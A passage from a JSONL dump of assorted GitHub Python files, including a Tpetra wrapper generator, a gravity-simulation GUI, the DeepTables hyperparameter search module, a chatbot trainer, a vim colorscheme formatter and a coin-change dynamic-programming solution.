str(tot_percentage_correct_dependent_hypothesis)\n\nprint(text)\n","repo_name":"jonassagild/Track-to-Track-Fusion","sub_path":"scripts/mc_associations_same_origin.py","file_name":"mc_associations_same_origin.py","file_ext":"py","file_size_in_byte":10289,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"81"} +{"seq_id":"40003804557","text":"import sys\nsys.path.append('lib/')\n\nimport os\nfrom string import Template\nfrom ConfigParser import SafeConfigParser\nfrom XpetraLib import *\nfrom XpetraLibConfig import *\n\n\ndef buildFuncLineTpetra( functionNode ):\n\n#TODO: clean up\n tree = etree.parse(conf_XMLclass)\n root = tree.getroot() # root == \n classNode = root[0] # classNode == \n\n fullClassName = classNode.xpath('compoundname')[0].text # Tpetra::Map\n baseClassName = fullClassName.lstrip('Tpetra::') # Map\n className = 'Tpetra'+baseClassName # TpetraMap\n##\n\n # = function name\n name = functionNode.xpath('name')[0].text\n if name == baseClassName: name = className\n if name == '~'+baseClassName: name = '~'+className\n\n # = return type of the function\n type = functionNode.xpath('type')[0].xpath(\"string()\")\n\n # \n argsstring = functionNode.xpath('argsstring')[0].text\n\n # skip deprecated functions\n if 'TPETRA_DEPRECATED' in type: return ''\n\n # hack for Vector:\n # - add missing 'typename'\n # - do not add MultiVector inherited methods\n if 'magnitudeType' in type: type = 'typename ' + type\n if functionNode.xpath('//compoundname')[0].text == 'Tpetra::Vector':\n if name in ['dot','norm1','norm2','normInf','normWeighted','meanValue'] and 'ArrayView' in argsstring: return ''\n if functionNode.xpath('//compoundname')[0].text == 'Tpetra::Vector':\n if name in ['replaceGlobalValue','sumIntoGlobalValue','replaceLocalValue','sumIntoLocalValue'] and 'size_t vectorIndex' in argsstring: return ''\n\n # hack for MultiVector\n # if name == \"scale\" and \"Teuchos::ArrayView< const Scalar > alpha\" in argsstring: return ''\n # if name == \"scale\" and \"const Scalar &alpha, const MultiVector< Scalar, LocalOrdinal, GlobalOrdinal, Node > &A\" in argsstring: return ''\n\n #hack for CrsMatrix\n if name == \"getLocalRowCopy\" and \"const =0\" in argsstring: return ''\n if name == \"TpetraCrsMatrix\" and \"const RCP< const CrsGraph< LocalOrdinal, GlobalOrdinal, Node> > &graph\" in argsstring: return ''\n if className == \"TpetraCrsMatrix\" and \"const =0\" in argsstring: argsstring = argsstring.replace(\"const =0\", \"const\")\n\n #hack for RowMatrix\n if className == \"TpetraRowMatrix\" and \"const =0\" in argsstring: argsstring = argsstring.replace(\"const =0\", \"const\")\n\n # -> get list of arg name as a string 'GIDList, nodeIDList, LIDList'\n # Simple version\n # paramList = functionNode.xpath('param/declname/text()')\n # paramStr = ', '.join(param for param in paramList)\n\n # More complete version\n paramStr = ''\n paramNodes = functionNode.xpath('param')\n #print name\n for paramNode in paramNodes:\n n = paramNode.xpath('declname')[0].xpath(\"string()\")\n if paramNode.xpath('type')[0].xpath(\"string()\") in conf_TypeWrapped:\n paramStr += \"toTpetra(\" + n + \")\"\n else:\n paramStr += n\n\n paramStr += \", \"\n\n paramStr = paramStr.rstrip(', ')\n\n # briefdescription\n briefdescription = functionNode.xpath(\"briefdescription\")[0].xpath(\"string()\")\n\n if len(type) > 0:\n declStr = type + \" \" + name + argsstring\n else:\n declStr = name + argsstring\n declStr = declStr.rstrip()\n\n if name in conf_RemoveRefFunctionList: declStr = declStr.replace('&', '')\n\n descStr = \" //! \" + briefdescription.lstrip().rstrip() + \"\\n\"\n defStr = \" \" + declStr\n\n if name != className and name != \"~\"+className:\n defStr += \" { \"\n defStr += \"XPETRA_MONITOR(\\\"\" + className + \"::\" + name + \"\\\"); \"\n if len(type) > 0 and type != 'void': defStr += 'return '\n if type in conf_TypeWrapped: defStr += \"toXpetra(\"\n defStr += conf_memberName + \"->\" + name\n defStr += \"(\" + paramStr\n if type in conf_TypeWrapped: defStr += \")\"\n defStr += \"); }\"\n\n # constructor\n if name == className:\n defStr += \"\\n \" + \": \" + conf_memberName + \"(Teuchos::rcp(new \" + fullClassName + \"< \"+templateParam+\" >\"\n defStr += \"(\" + paramStr + \"))) { \"\n defStr += \" }\"\n\n # destructor\n if name == '~'+className:\n defStr += \" { \"\n defStr += \" }\"\n\n return descStr + defStr + \"\\n\" + \"\\n\";\n\n####\n\nxml_dir = trilinosRoot_dir + '/packages/tpetra/doc/xml/'\nconf_dir = 'tpetra/conf/'\ntmpl_dir = 'tpetra/tmpl/'\nout_dir = '../src/'\n\nfor file in os.listdir(conf_dir):\n basename, extension = os.path.splitext(file)\n if extension == \".conf\":\n\n#### READ CONFIG ####\n parser = SafeConfigParser()\n parser.read(conf_dir + file)\n\n conf_XMLheaders = xml_dir + parser.get('io', 'XMLheaders')\n conf_XMLclass = xml_dir + parser.get('io', 'XMLclass')\n conf_template = tmpl_dir + parser.get('io', 'template')\n conf_output = parser.get('io', 'output')\n\n conf_SkipFunctionList = set(parser.get('function', 'skip').split(';'))\n conf_RemoveRefFunctionList = set(parser.get('function', 'removeref').split(';'))\n conf_SkipHeaderList = set(parser.get('header', 'skip').split(';'))\n conf_memberName = parser.get('member', 'name')\n conf_TypeWrapped = set(parser.get('type', 'wrapped').split(';'))\n#\n\n template = open(conf_template, 'r').read()\n out = Template(template)\n\n className = buildClassDefinition(conf_XMLclass, 'Tpetra')\n templateParam = buildTemplateParam2(conf_XMLclass)\n\n out = out.substitute(\n TMPL_HEADERS=buildHeader(className, 'tpetra.py'),\n TMPL_INCLUDES=buildInclude(conf_XMLheaders, conf_SkipHeaderList),\n TMPL_TEMPLATE_PARAM=buildTemplateParam(conf_XMLclass),\n TMPL_CLASS=className,\n TMPL_INHERITANCE=' ' + parser.get('inheritance', 'parent').rstrip(),\n TMPL_DESTRUCTOR=buildDestructor(className),\n TMPL_PUBLIC_FUNCTIONS=buildClassFunctions(conf_XMLclass, conf_SkipFunctionList, buildFuncLineTpetra),\n TMPL_FOOTERS=buildFooter(className)\n )\n f = open(out_dir + conf_output, 'w')\n f.write(out)\n f.close()\n\n","repo_name":"trilinos/Trilinos","sub_path":"packages/xpetra/scripts/tpetra.py","file_name":"tpetra.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"81"} +{"seq_id":"346097491","text":"from tkinter import *\nimport Search as Search\nimport Import_Data as ID\nimport Export_Data as ED\nimport Colour_Maker as CM\nimport Check_Input as CI\nimport Random_Input as RI\nimport os\n\n\ndef main():\n width_of_window = int(1005)\n height_of_window = int(1005)\n\n points = []\n correct_input = True\n\n while correct_input:\n N = input(\"Введите число точек: (Целое число, после ввода нажмите enter)\")\n\n\n if not N.isdigit():\n print('Некорректный ввод, повторите попытку: ')\n continue\n\n N = int(N)\n\n if N == 0:\n print('Введите число, отличное от 0')\n continue\n\n\n print('Как произвести заполнение данных о точках, вручную или случайным образом?')\n mod = int(input('Введите 0, если заполнение будет в ручном режиме, или 1, если желаете заполнить данные'\n ' автоматически: '))\n\n if mod == 1:\n points = RI.Random_points(N)\n else:\n i = 0\n while i < N:\n points.append([input(\"Введите массу точки в десятичном формате (XXX.X), затем нажмите enter): \"),\n input(\"Введите координату x точки (целое число, не больше 200), затем нажмите enter: \"),\n input(\"Введите координату н точки (целое число, не больше 200), затем нажмите enter: \")])\n\n if ((CI.is_digit(points[i][0]) is False or (points[i][0].isdigit())) or\n ((points[i][1].isdigit() is False) or (int(points[i][1]) < 0 or int(points[i][1]) > 200)) or\n ((points[i][2].isdigit() is False) or (int(points[i][2]) < 0 or int(points[i][2]) > 200))):\n print('Вы ввели некоректные данные. Повторите ввод данный последней точки: ')\n points.pop(i)\n else:\n i = i + 1\n\n ED.Export_Data(points, N)\n\n os.system('.\\Simulation.exe')\n\n Data, a = ID.Import_data(\"Data.txt\")\n maximum, minimum = Search.Search(Data, a)\n\n os.system('del Data.txt')\n os.system('del Points.txt')\n\n correct_input = False\n\n root = Tk()\n c = Canvas(root, width=width_of_window, height=height_of_window, bg='white')\n\n rectangle_width = int(width_of_window / a)\n rectangle_height = int(height_of_window / a)\n\n for i in range(a):\n for j in range(a):\n colour = CM.Make_colour_index(Data[i][j], minimum, maximum)\n x_up = j * rectangle_width\n y_up = i * rectangle_height\n x_down = x_up + rectangle_width\n y_down = y_up + rectangle_height\n c.create_rectangle(x_up, y_up, x_down, y_down, fill=colour)\n\n c.pack()\n root.mainloop()\n\n\nmain()\n","repo_name":"VarlamovAM/Training_projects","sub_path":"Simulation_of_gravity/main_GUI.py","file_name":"main_GUI.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73840446664","text":"# -*- coding:utf-8 -*-\n__author__ = 'yangjian'\n\"\"\"\n\n\"\"\"\nimport copy\n\nimport pandas as pd\nimport pickle\n\nfrom deeptables.models.config import ModelConfig\nfrom deeptables.models.deeptable import DeepTable\nfrom deeptables.models.preprocessor import DefaultPreprocessor\nfrom deeptables.utils import dt_logging, fs, consts as DT_consts\nfrom hypernets.core.search_space import HyperSpace, ModuleSpace, Choice, Bool, MultipleChoice\nfrom hypernets.experiment import make_experiment as _make_experiment\nfrom hypernets.model import Estimator, HyperModel\nfrom hypernets.utils import DocLens, isnotebook\n\nlogger = dt_logging.get_logger(__name__)\n\n\ndef _to_hp(v):\n if isinstance(v, (list, tuple)):\n v = Choice(v)\n return v\n\n\nclass DTModuleSpace(ModuleSpace):\n def __init__(self, space=None, name=None, **hyperparams):\n ModuleSpace.__init__(self, space, name, **hyperparams)\n self.space.DT_Module = self\n self.config = None\n\n def _compile(self):\n self.config = ModelConfig(**self.param_values)\n\n def _forward(self, inputs):\n return inputs\n\n def _on_params_ready(self):\n self._compile()\n\n\nclass DTFit(ModuleSpace):\n def __init__(self, space=None, name=None, **hyperparams):\n # if batch_size is None:\n # batch_size = Choice([128, 256])\n # hyperparams['batch_size'] = batch_size\n #\n # if epochs is not None:\n # hyperparams['epochs'] = epochs\n\n for k, v in hyperparams.items():\n hyperparams[k] = _to_hp(v)\n\n ModuleSpace.__init__(self, space, name, **hyperparams)\n self.space.fit_params = self\n\n def _compile(self):\n pass\n\n def _forward(self, inputs):\n return inputs\n\n def _on_params_ready(self):\n self._compile()\n\n\nclass DnnModule(ModuleSpace):\n def __init__(self, hidden_units=None, reduce_factor=None, dnn_dropout=None, use_bn=None, dnn_layers=None,\n activation=None, space=None, name=None, **hyperparams):\n if hidden_units is None:\n hidden_units = [100, 200, 300, 500, 800, 1000]\n hyperparams['hidden_units'] = _to_hp(hidden_units)\n\n if reduce_factor is None:\n reduce_factor = [1, 0.8, 0.5]\n hyperparams['reduce_factor'] = _to_hp(reduce_factor)\n\n if dnn_dropout is None:\n dnn_dropout = [0, 0.1, 0.3, 0.5]\n hyperparams['dnn_dropout'] = _to_hp(dnn_dropout)\n\n if use_bn is None:\n use_bn = Bool()\n hyperparams['use_bn'] = use_bn\n\n if dnn_layers is None:\n dnn_layers = [1, 2, 3]\n hyperparams['dnn_layers'] = _to_hp(dnn_layers)\n\n if activation is None:\n activation = 'relu'\n hyperparams['activation'] = activation\n\n ModuleSpace.__init__(self, space, name, **hyperparams)\n\n def _compile(self):\n dnn_layers = self.param_values['dnn_layers']\n hidden_units = []\n for i in range(0, dnn_layers):\n hidden_units.append(\n (int(self.param_values['hidden_units'] * 1 if i == 0 else (\n self.param_values['hidden_units'] * (self.param_values['reduce_factor'] ** i))),\n self.param_values['dnn_dropout'],\n self.param_values['use_bn']))\n dnn_params = {\n 'hidden_units': hidden_units,\n 'dnn_activation': self.param_values['activation'],\n }\n self.space.DT_Module.config = self.space.DT_Module.config._replace(dnn_params=dnn_params)\n\n def _forward(self, inputs):\n return inputs\n\n def _on_params_ready(self):\n self._compile()\n\n\nclass DTEstimator(Estimator):\n def __init__(self, space_sample, cache_preprocessed_data=False, **config_kwargs):\n Estimator.__init__(self, space_sample=space_sample)\n\n self.config_kwargs = config_kwargs\n self.cache_preprocessed_data = cache_preprocessed_data\n self.model = self._build_model(space_sample)\n\n # fitted\n self.classes_ = None\n\n def _build_model(self, space_sample):\n config = space_sample.DT_Module.config._replace(**self.config_kwargs)\n if self.cache_preprocessed_data:\n preprocessor = DefaultPreprocessor(config)\n else:\n preprocessor = None\n model = DeepTable(config, preprocessor=preprocessor)\n return model\n\n def summary(self):\n if logger.is_info_enabled():\n try:\n mi = self.model.get_model()\n if mi is not None:\n mi.model.summary()\n except(Exception) as ex:\n pass\n # logger.info('---------no summary-------------')\n # logger.info(ex)\n\n def fit(self, X, y, eval_set=None, pos_label=None, n_jobs=1, **kwargs):\n # fit_params = self.space_sample.__dict__.get('fit_params')\n # if fit_params is not None:\n # kwargs.update(fit_params.param_values)\n if kwargs.get('cross_validation') is not None:\n kwargs.pop('cross_validation')\n self.model.fit_cross_validation(X, y, n_jobs=n_jobs, **kwargs)\n else:\n fit_kwargs = self.space_sample.fit_params.param_values.copy()\n fit_kwargs.update(kwargs)\n self.model.fit(X, y, **fit_kwargs)\n\n self.classes_ = getattr(self.model, 'classes_', None)\n return self\n\n def fit_cross_validation(self, X, y, eval_set=None, metrics=None, pos_label=None, **kwargs):\n assert isinstance(metrics, (list, tuple))\n fit_kwargs = self.space_sample.fit_params.param_values.copy()\n fit_kwargs.update(kwargs)\n oof_proba, _, _, oof_scores = self.model.fit_cross_validation(X, y, oof_metrics=metrics, **fit_kwargs)\n\n # calc final score with mean\n scores = pd.concat([pd.Series(s) for s in oof_scores], axis=1).mean(axis=1).to_dict()\n logger.info(f'fit_cross_validation score:{scores}, folds score:{oof_scores}')\n\n self.classes_ = getattr(self.model, 'classes_', None)\n\n return scores, oof_proba, oof_scores, None, None, None, None\n\n def predict(self, X, **kwargs):\n return self.model.predict(X, **kwargs)\n\n def evaluate(self, X, y, eval_set=None, metrics=None, **kwargs):\n # scores = self.model.evaluate(X, y, batch_size=256, return_dict=False)\n scores = self.model.evaluate(X, y, batch_size=256, return_dict=False)\n dt_model = self.model.get_model()\n\n tf_metrics_names = dt_model.model.metrics_names\n\n user_metrics = dt_model.config.metrics\n if len(scores) != (len(user_metrics) + 1):\n raise ValueError(f\"Evaluate result has {len(scores)} items with loss score,\" +\n f\" not match with user specified metrics {user_metrics}; tf metrics names {tf_metrics_names}\")\n\n loss_name = tf_metrics_names[0]\n ret_metrics = [loss_name]\n ret_metrics.extend(dt_model.config.metrics)\n\n logger.info(f\"TF metrics names is {tf_metrics_names} and user's is {user_metrics}\")\n\n result = dict(zip(ret_metrics, scores))\n\n return result\n\n def predict_proba(self, X, **kwargs):\n result = self.model.predict_proba(X, **kwargs)\n return result\n\n def save(self, model_path):\n if not model_path.endswith(fs.sep):\n model_path = model_path + fs.sep\n\n self.model.save(model_path)\n\n stub = copy.copy(self)\n stub.model = None\n stub_path = model_path + 'dt_estimator.pkl'\n with fs.open(stub_path, 'wb') as f:\n pickle.dump(stub, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n @staticmethod\n def load(model_path):\n if not fs.exists(model_path):\n raise ValueError(f'Not found storage path: {model_path}')\n\n if not model_path.endswith(fs.sep):\n model_path = model_path + fs.sep\n\n stub_path = model_path + 'dt_estimator.pkl'\n if not fs.exists(stub_path):\n raise ValueError(f'Not found storage path of estimator: {stub_path}')\n\n with fs.open(stub_path, 'rb') as f:\n stub = pickle.load(f)\n\n model = DeepTable.load(model_path)\n stub.model = model\n\n return stub\n\n def get_iteration_scores(self):\n return []\n\n def __getstate__(self):\n try:\n state = super().__getstate__()\n except AttributeError:\n state = self.__dict__.copy()\n\n state['model'] = None\n\n return state\n\n\nclass HyperDT(HyperModel):\n def __init__(self, searcher, dispatcher=None, callbacks=[], reward_metric=None, discriminator=None,\n max_model_size=0, cache_preprocessed_data=False, **config_kwargs):\n self.config_kwargs = config_kwargs\n metrics = config_kwargs.get('metrics')\n if metrics is None and reward_metric is None:\n raise ValueError('Must specify `reward_metric` or `metrics`.')\n if reward_metric is None:\n reward_metric = metrics[0]\n if metrics is None:\n metrics = [reward_metric]\n config_kwargs['metrics'] = metrics\n if reward_metric not in metrics:\n metrics.append(reward_metric)\n config_kwargs['metrics'] = metrics\n self.cache_preprocessed_data = cache_preprocessed_data\n HyperModel.__init__(self, searcher, dispatcher=dispatcher, callbacks=callbacks, reward_metric=reward_metric)\n\n def load_estimator(self, model_file):\n assert model_file is not None\n return DTEstimator.load(model_file)\n\n def _get_estimator(self, space_sample):\n estimator = DTEstimator(space_sample, self.cache_preprocessed_data, **self.config_kwargs)\n return estimator\n\n def export_trial_configuration(self, trial):\n default_conf = ModelConfig()\n new_conf = trial.space_sample.DT_Module.config\n conf_set = []\n for f in default_conf._fields:\n if new_conf.__getattribute__(f) != default_conf.__getattribute__(f):\n conf_set.append(f'\\n\\t{f}={new_conf.__getattribute__(f)}')\n str = f'ModelConfig({\",\".join(conf_set)})\\n\\nfit params:{trial.space_sample.fit_params.param_values}'\n return str\n\n\ndef default_dt_space(**hyperparams):\n space = HyperSpace()\n with space.as_default():\n p_nets = MultipleChoice(\n ['dnn_nets', 'linear', 'cin_nets', 'fm_nets', 'afm_nets', 'pnn_nets',\n 'cross_nets', 'cross_dnn_nets', 'dcn_nets',\n 'autoint_nets', 'fgcnn_dnn_nets', 'fibi_dnn_nets'], num_chosen_most=3)\n dt_module = DTModuleSpace(\n nets=p_nets,\n auto_categorize=Bool(),\n cat_remain_numeric=Bool(),\n auto_discrete=Bool(),\n apply_gbm_features=Bool(),\n gbm_feature_type=Choice([DT_consts.GBM_FEATURE_TYPE_DENSE, DT_consts.GBM_FEATURE_TYPE_EMB]),\n embeddings_output_dim=Choice([4, 10, 20]),\n embedding_dropout=Choice([0, 0.1, 0.2, 0.3, 0.4, 0.5]),\n stacking_op=Choice([DT_consts.STACKING_OP_ADD, DT_consts.STACKING_OP_CONCAT]),\n output_use_bias=Bool(),\n apply_class_weight=Bool(),\n earlystopping_patience=Choice([1, 3, 5])\n )\n dnn = DnnModule()(dt_module)\n fit = DTFit(**hyperparams)(dt_module)\n\n return space\n\n\ndef mini_dt_space(**hyperparams):\n space = HyperSpace()\n with space.as_default():\n p_nets = MultipleChoice(\n ['dnn_nets', 'linear', 'fm_nets'], num_chosen_most=2)\n dt_module = DTModuleSpace(\n nets=p_nets,\n auto_categorize=Bool(),\n cat_remain_numeric=Bool(),\n auto_discrete=Bool(),\n apply_gbm_features=Bool(),\n gbm_feature_type=Choice([DT_consts.GBM_FEATURE_TYPE_DENSE, DT_consts.GBM_FEATURE_TYPE_EMB]),\n embeddings_output_dim=Choice([4, 10]),\n embedding_dropout=Choice([0, 0.5]),\n stacking_op=Choice([DT_consts.STACKING_OP_ADD, DT_consts.STACKING_OP_CONCAT]),\n output_use_bias=Bool(),\n apply_class_weight=Bool(),\n earlystopping_patience=Choice([1, 3, 5])\n )\n dnn = DnnModule(hidden_units=Choice([100, 200]),\n reduce_factor=Choice([1, 0.8]),\n dnn_dropout=Choice([0, 0.3]),\n use_bn=Bool(),\n dnn_layers=2,\n activation='relu')(dt_module)\n fit = DTFit(**hyperparams)(dt_module)\n\n return space\n\n\ndef mini_dt_space_validator(sample):\n nets = [p.value for p in sample.get_assigned_params() if p.alias.endswith('.nets')][0]\n return nets != ['fm_nets']\n\n\ndef tiny_dt_space(**hyperparams):\n space = HyperSpace()\n with space.as_default():\n dt_module = DTModuleSpace(\n nets=['dnn_nets'],\n auto_categorize=Bool(),\n cat_remain_numeric=Bool(),\n auto_discrete=False,\n apply_gbm_features=False,\n stacking_op=Choice([DT_consts.STACKING_OP_ADD, DT_consts.STACKING_OP_CONCAT]),\n output_use_bias=Bool(),\n apply_class_weight=Bool(),\n earlystopping_patience=Choice([1, 3, 5])\n )\n dnn = DnnModule(hidden_units=Choice([10, 20]),\n reduce_factor=1,\n dnn_dropout=Choice([0, 0.3]),\n use_bn=False,\n dnn_layers=2,\n activation='relu')(dt_module)\n hyperparams['batch_size'] = [64, 100]\n fit = DTFit(**hyperparams)(dt_module)\n\n return space\n\n # categorical_columns='auto',\n # exclude_columns=[],\n # pos_label=None,\n # metrics=['accuracy'],\n # auto_categorize=False,\n # cat_exponent=0.5,\n # cat_remain_numeric=True,\n # auto_encode_label=True,\n # auto_imputation=True,\n # auto_discrete=False,\n # apply_gbm_features=False,\n # gbm_params={},\n # gbm_feature_type=DT_consts.GBM_FEATURE_TYPE_EMB, # embedding/dense\n # fixed_embedding_dim=True,\n # embeddings_output_dim=4,\n # embeddings_initializer='uniform',\n # embeddings_regularizer=None,\n # embeddings_activity_regularizer=None,\n # dense_dropout=0,\n # embedding_dropout=0.3,\n # stacking_op=DT_consts.STACKING_OP_ADD,\n # output_use_bias=True,\n # apply_class_weight=False,\n # optimizer='auto',\n # loss='auto',\n # dnn_params={\n # 'hidden_units': ((128, 0, False), (64, 0, False)),\n # 'dnn_activation': 'relu',\n # },\n # autoint_params={\n # 'num_attention': 3,\n # 'num_heads': 1,\n # 'dropout_rate': 0,\n # 'use_residual': True,\n # },\n # fgcnn_params={'fg_filters': (14, 16),\n # 'fg_heights': (7, 7),\n # 'fg_pool_heights': (2, 2),\n # 'fg_new_feat_filters': (2, 2),\n # },\n # fibinet_params={\n # 'senet_pooling_op': 'mean',\n # 'senet_reduction_ratio': 3,\n # 'bilinear_type': 'field_interaction',\n # },\n # cross_params={\n # 'num_cross_layer': 4,\n # },\n # pnn_params={\n # 'outer_product_kernel_type': 'mat',\n # },\n # afm_params={\n # 'attention_factor': 4,\n # 'dropout_rate': 0\n # },\n # cin_params={\n # 'cross_layer_size': (128, 128),\n # 'activation': 'relu',\n # 'use_residual': False,\n # 'use_bias': False,\n # 'direct': False,\n # 'reduce_D': False,\n # },\n # home_dir=None,\n # monitor_metric=None,\n # earlystopping_patience=1,\n # gpu_usage_strategy=DT_consts.GPU_USAGE_STRATEGY_GROWTH,\n # distribute_strategy=None,\n\n\ndef make_experiment(train_data,\n searcher=None,\n search_space=None,\n **kwargs):\n \"\"\"\n Utility to make CompeteExperiment instance with HyperDT.\n\n Parameters\n ----------\n\n Returns\n -------\n Runnable experiment object\n\n Notes:\n -------\n Initlialize Dask default client to enable dask in experiment.\n\n Examples:\n -------\n Create experiment with csv data file '/opt/data01/test.csv', and run it\n >>> experiment = make_experiment('/opt/data01/test.csv', target='y')\n >>> estimator = experiment.run()\n\n Create experiment with csv data file '/opt/data01/test.csv' with INFO logging, and run it\n >>> experiment = make_experiment('/opt/data01/test.csv', target='y', log_level='info')\n >>> estimator = experiment.run()\n\n Create experiment with parquet data files '/opt/data02/*.parquet', and run it with Dask\n >>> from dask.distributed import Client\n >>>\n >>> client = Client()\n >>> experiment = make_experiment('/opt/data02/*.parquet', target='y')\n >>> estimator = experiment.run()\n\n \"\"\"\n\n searcher_options = kwargs.pop('searcher_options', {})\n if (searcher is None or isinstance(searcher, str)) and search_space is None:\n search_space = mini_dt_space\n searcher_options['space_sample_validation_fn'] = mini_dt_space_validator\n\n default_settings = dict(verbose=0,\n # n_jobs=-1,\n )\n for k, v in default_settings.items():\n if k not in kwargs.keys():\n kwargs[k] = v\n if kwargs.get('cv', True) and 'n_jobs' not in kwargs.keys():\n kwargs['n_jobs'] = -1\n\n config_options = {}\n option_keys = set(f for f in ModelConfig._fields if f not in {'name', 'task', 'metrics', 'nets', 'pos_label'})\n for k in option_keys:\n if k in kwargs.keys():\n config_options[k] = kwargs.pop(k)\n if 'pos_label' in kwargs.keys():\n config_options['pos_label'] = kwargs.get('pos_label')\n\n if isnotebook() and 'callbacks' not in kwargs.keys():\n from hypernets.experiment import SimpleNotebookCallback\n from hypernets.core import NotebookCallback as SearchNotebookCallback\n\n kwargs['callbacks'] = [SimpleNotebookCallback()]\n kwargs['search_callbacks'] = [SearchNotebookCallback()]\n\n experiment = _make_experiment(HyperDT, train_data,\n searcher=searcher,\n searcher_options=searcher_options,\n search_space=search_space,\n hyper_model_options=config_options,\n **kwargs)\n return experiment\n\n\n_search_space_doc = \"\"\"\n default is mini_dt_space.\"\"\"\n\n\ndef _merge_doc():\n my_doc = DocLens(make_experiment.__doc__)\n params = DocLens(_make_experiment.__doc__).parameters\n params.pop('hyper_model_cls')\n params['search_space'] += _search_space_doc\n my_doc.parameters = params\n\n make_experiment.__doc__ = my_doc.render()\n\n\n_merge_doc()\n","repo_name":"DataCanvasIO/DeepTables","sub_path":"deeptables/models/hyper_dt.py","file_name":"hyper_dt.py","file_ext":"py","file_size_in_byte":18665,"program_lang":"python","lang":"en","doc_type":"code","stars":607,"dataset":"github-code","pt":"81"} +{"seq_id":"29112588968","text":"from chatterbot import ChatBot\r\nfrom chatterbot.trainers import ListTrainer\r\nimport os\r\n\r\nbot = ChatBot('Test')\r\ntrainer = ListTrainer(bot)\r\n\r\nfor files in os.listdir('D:/New folder (2)/'):\r\n conversation = open('D:/New folder (2)/' + files, 'r').readlines()\r\n trainer.train(conversation)\r\n\r\nwhile True:\r\n request = input('You:').lower()\r\n response = bot.get_response(request)\r\n print('Botish:', response)\r\n","repo_name":"LaraIyswaryaRaneR/CHATBOT","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"86382582266","text":"from colortrans import rgb2short\nimport re\nimport sys\n\n\nHI_PATTERN = re.compile(\"hi\\s+(\\S*)\\s+(.*)\")\n\n\nif __name__ == \"__main__\":\n try:\n filename = sys.argv[1]\n with open(filename) as f:\n contents = f.read()\n\n def format_attributes(match):\n style_name, attr_string = match.groups()\n\n attrs = {}\n for attr in attr_string.split():\n name, value = attr.strip().split(\"=\")\n attrs[name] = value\n\n if \"guifg\" in attrs:\n value = attrs[\"guifg\"]\n attrs[\"ctermfg\"] = \"None\" if value == \"NONE\" else rgb2short(value)[0]\n if \"guibg\" in attrs:\n value = attrs[\"guibg\"]\n attrs[\"ctermbg\"] = \"None\" if value == \"NONE\" else rgb2short(value)[0]\n if \"gui\" in attrs:\n value = attrs[\"gui\"]\n attrs[\"cterm\"] = value[0] + value[1:].lower()\n\n format_attr = lambda name: \"{}={}\".format(name, attrs.get(name)) if name in attrs else \"\"\n\n attrs_formatted = \"{: <13} {: <13} {: <13} {: <13} {: <13} {: <13}\".format(\n format_attr(\"guifg\"),\n format_attr(\"guibg\"),\n format_attr(\"gui\"),\n format_attr(\"ctermfg\"),\n format_attr(\"ctermbg\"),\n format_attr(\"cterm\")).strip()\n\n return \"hi {: <15} {}\".format(style_name, attrs_formatted)\n\n formatted = HI_PATTERN.sub(format_attributes, contents)\n print(formatted)\n\n except IndexError:\n print(\"error: Expected a vim colorscheme file as first argument\")\n except KeyError:\n print(\"error: Invalid color value in source\")\n except:\n print(\"error: Something else went wrong\")\n","repo_name":"mistodon/dotfiles","sub_path":"bin/format_vim_colorscheme.py","file_name":"format_vim_colorscheme.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15302344340","text":"import pandas as pd\nimport json\nfrom gc import collect\nimport re\nfrom nltk.corpus import stopwords\n\n\ndef make_corps(jstrin):\n tokens = []\n for token in json.loads(jstrin):\n if token['lemma'] not in stopWords:\n lemma = re.sub(r'\\W', '', token['lemma'])\n if lemma:\n tokens.append(lemma.lower())\n return ' '.join(tokens)\n\n\nstopWords = set(stopwords.words())\n\ntrain = pd.read_csv('../data/train_parsed.csv')#, usecols=['content'])\n\ncorps = pd.DataFrame(index = train.index)\ncorps['content'] = train.content.apply(lambda x: make_corps(x))\n\ncorps.to_csv('../data/train_corps.csv')\ntrain.drop('content', axis=1,inplace=True)\ntrain.to_pickle('../data/train.pickle', compression='xz')\n\ndel train, corps\ncollect()\n\ntest = pd.read_csv('../data/test_parsed.csv')\ncorps = pd.DataFrame(index = test.index)\ncorps['content'] = test.content.apply(lambda x: make_corps(x))\ncorps.to_csv('../data/test_corps.csv')\ntest.drop('content', axis=1,inplace=True)\ntest.to_pickle('../data/test.pickle', compression='xz')\n\n","repo_name":"schokoro/how-good-is-your-medium-article","sub_path":"prepare_corpus.py","file_name":"prepare_corpus.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15381831060","text":"\"\"\"This module contains algorithms to solve the dynamic programming\nProblem - Min Coins to Make Change.\n\nThe problem statement can be found here - https://leetcode.com/problems/coin-change/\n\n\nRecurrence Relation\n---------------------\nf(c, A) = 0, if A == 0\nf(c, A) = 1 + min(f(c, A - c[i])), for all 'i' from 0 to c - 1 where c[i] <= A\n\n\n- In English, this says, that if you are given an amount of 0,\nthe minimum number of coins you need to use to make change is 0\n- For the recursive case, you need to try all possible combinations to make change\nwith each coin as long as that coin is less than or equal to the remaining amount\n- Take the minimum of all possible paths as your answer\n\"\"\"\n\n# Bottom Up Solution\n# time complexity: O(n * m), where 'n' is the total and 'm' is the length of coins\n# space comexplity: O(n)\n\n\ndef min_coins_to_make_change(coins, total):\n if not coins:\n return 0\n memo = [float(\"inf\")] * (total + 1)\n memo[0] = 0\n for amount in range(1, total + 1):\n for coin in coins:\n if coin <= amount:\n memo[amount] = min(memo[amount], 1 + memo[amount - coin])\n if memo[-1] == float(\"inf\"):\n return -1\n return memo[-1]\n\n\n# Top down solution with Recursion\n# time complexity: O(n * m), where 'n' is the amount and 'm' is the length of coins\n# space comexplity: O(n)\ndef coinChange(coins, amount):\n if not coins:\n return 0\n memo = [-1] * (amount + 1)\n min_coins = make_change(coins, amount, memo)\n if min_coins == float(\"inf\"):\n return -1\n return min_coins\n\n\ndef make_change(coins, remaining_amount, memo):\n if remaining_amount == 0:\n min_coins = 0\n elif 